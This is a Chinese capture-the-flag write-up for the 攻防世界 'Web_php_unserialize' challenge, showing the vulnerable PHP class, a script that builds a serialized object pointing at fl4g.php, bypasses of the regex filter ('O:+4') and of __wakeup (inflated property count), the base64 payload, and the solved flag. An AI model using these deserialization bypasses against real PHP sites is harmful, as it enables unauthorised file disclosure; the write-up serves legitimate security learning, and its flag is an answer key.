【攻防世界-Web进阶篇-006Web_php_unserialize】

解：打开靶机是一段php代码，代码审计，发现是一道反序列化问题。在上一篇咱们提到过_wakeup()函数需要通过不正确的属性值来绕过，所以这一点已经解决。

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { //创建时执行
        $this->file = $file; 
    }
    function __destruct() { //摧毁时执行
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php//提示答案在这里
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); //对参数解码
    if (preg_match('/[oc]:\d+:/i', $var)) { //正则表达式
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

先进行序列化

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
$test=new Demo("fl4g.php");
$a=serialize($test);
echo($a);
?>

O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}

然后再对_wakeup()函数、正则表达式进行绕过，添加下面两条语句。

$a=str_replace('O:4','O:+4',$a);//绕过正则表达式
$a=str_replace('1:{','2:{',$a);//绕过_wakeup()函数

O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}

 不要忘记再加上64base编码，否则还是打不开的。

echo base64_encode($a);

TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

payload:?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

 ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}